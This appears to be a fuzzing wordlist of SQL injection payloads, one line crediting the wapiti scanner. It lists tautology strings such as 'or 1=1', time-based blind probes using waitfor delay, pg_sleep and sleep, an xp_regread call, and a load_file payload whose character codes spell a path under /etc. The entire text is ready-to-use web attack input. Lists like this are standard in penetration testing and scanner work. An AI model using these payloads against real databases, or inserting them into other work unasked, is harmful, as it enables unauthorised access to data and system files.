'
)%20or%20('x'='x
%20or%201=1
";waitfor delay '0:0:__TIME__'--
1) or pg_sleep(__TIME__)--
"hi"") or (""a""=""a"
" or sleep(__TIME__)#
 or 0=0 #
1) or sleep(__TIME__)#
) or ('a'='a
; exec xp_regread
"a"" or 3=3--"
# from wapiti
 or 0=0 --
1 waitfor delay '0:0:10'--
 or 'a'='a
hi or 1=1 --"
or a = a
) or sleep(__TIME__)='
hi') or ('a'='a
));waitfor delay '0:0:__TIME__'--
a' waitfor delay '0:0:10'--
1;(load_file(char(47,101,116,99,47,112,97,115, ...
" or pg_sleep(__TIME__)--
x' AND email IS NULL; --
or a=a
" or "a"="a
x' AND members.email IS NULL; --